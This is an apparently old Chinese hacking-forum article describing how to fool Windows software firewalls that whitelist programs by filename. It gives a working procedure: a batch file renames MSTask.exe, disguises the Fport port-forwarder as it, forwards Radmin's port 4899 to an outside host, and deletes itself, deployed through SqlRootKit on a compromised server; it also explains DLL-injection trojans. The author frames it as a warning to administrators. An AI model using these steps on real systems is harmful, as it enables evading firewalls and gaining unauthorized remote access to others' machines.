一直以來都有一個夢想：要是能發(fā)現(xiàn)些漏洞或BUG什么的該多好??！于是整天對著電腦瞎弄瞎研究，研究什么呢？研究如何突破防火墻（偶這里指的防火墻是軟體型的個人防火墻，硬件的偶也沒條件。）嘿嘿，你還別說，還真沒白研究，還真給偶發(fā)現(xiàn)了大多數(shù)防火墻的通病。這個BUG能讓我們欺騙防火墻來達到訪外的目的，具體情況是怎么樣的呢？請看下面的解說！  

　　首先，我要介紹一下Windows系統(tǒng)特性，當(dāng)一個程序運行時，它不能刪除，但卻能夠改名！而當(dāng)系統(tǒng)里的被保護程序遭到刪除或損壞或改名時系統(tǒng)就會及時調(diào)用備份文件給予還原！我再講講防火墻，大家都知道許多防火墻的“應(yīng)用程序規(guī)則”里一般默認(rèn)就會讓IE瀏覽器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、services.exe、svchost.exe通過，而大多的防火墻認(rèn)為只要是與規(guī)則里的路徑及文件名相同就Pass！以這樣的檢測方法來決定是否放行，但它卻完全沒考慮到如果是別的文件替換的呢？——就相當(dāng)于古裝片里的易容術(shù)，易容后就認(rèn)不得了！這就給了我們機會，我們可以利用這個BUG來欺騙防火墻來達到訪外的目的！  

　　小知識：其實現(xiàn)在大多木馬采用的DLL插線程技術(shù)也就是利用了這個原理，它們首先隱蔽的開啟一個認(rèn)證放行的程序進程（如Iexplore.exe進程），接著把DLL型木馬插入這個線程內(nèi)，然后訪外時就可輕松突破防火墻的限制了——因為防火墻是不會攔截已認(rèn)證放行的程序的。  

　　原理講完了，我們現(xiàn)在講講該如何利用這個BUG了！這里我用虛擬機做實驗，制造如下條件：  

　　為了更符合現(xiàn)實，我給服務(wù)器安裝了“天網(wǎng)防火墻”、Radmin（但由于防火墻指定了訪問IP地址，所以沒辦法正常連接?。?，MSSQL SERVER、Serv-u。首先我們用常用的方法進行端口轉(zhuǎn)發(fā)，看看防火墻有什么反應(yīng)！  

　　第一步，啟用AngelShell Ver 1.0里的Fport（用來進行端口轉(zhuǎn)發(fā)的服務(wù)端，幾乎可以轉(zhuǎn)發(fā)任何端口），然后在本地用FportClient（用來進行端口轉(zhuǎn)發(fā)的客戶端）監(jiān)聽好！  

　　第二步，直接在CMDSHELL里運行“e:\www\fport.exe 4899 192.168.1.1 7788”，這時我們看到虛擬機里的“天網(wǎng)”對Fport馬上進行了攔截。  

　　看到了吧！由于Fport并不是認(rèn)證放行的，防火墻馬上就進行了攔截！OK，現(xiàn)在我們實行欺騙計劃，看偶如何突破防火墻的！還是執(zhí)行第一步，然后新建一個批處理，內(nèi)容如下：  

ren MSTask.exe MSTask1.exe  

ren fport.exe MSTask.exe  

MSTask.exe 4899 192.168.1.1 7788  

Del %0  

　　命名為go.bat，接著用SqlRootKit把“Fport.exe”和go.bat 一起copy到目標(biāo)機子的c:\winnt\system32\（也就是MSTask所在的目錄）在SqlRootKit里執(zhí)行g(shù)o.bat（注意如果要改MSTask.exe的名的話就需要有管理員權(quán)限）。  

　　當(dāng)FportClient出現(xiàn)“已經(jīng)接受到遠程計算機的連接！”時，用Radmin客戶端連接本機的4899端口。  

　　我們已經(jīng)成功突破限制（由于防火墻沒有限制本地連接4899端口，我們用Fport轉(zhuǎn)發(fā)了它的端口，登錄時等于本地連接，因此我們能夠成功連接），這樣一來，我們本不能逃過防火墻的Fport便變成了一個有“插線程”技術(shù)的端口轉(zhuǎn)發(fā)工具了！  

　　據(jù)我實驗，國內(nèi)的防火墻幾乎無一例外的“擁有”這個BUG！雖然這個BUG不會帶來什么大的危害，但總是給入侵者多了一個黑我們的機會！  

　　WTF老大說獨樂樂不如眾樂樂，所以我還是公布出來了，一是可以讓我們國內(nèi)的防火墻有所改進，二是給網(wǎng)管們提個醒！由于小弟技術(shù)有限，難免會出現(xiàn)錯誤，歡迎各位指正批評。 

最新評論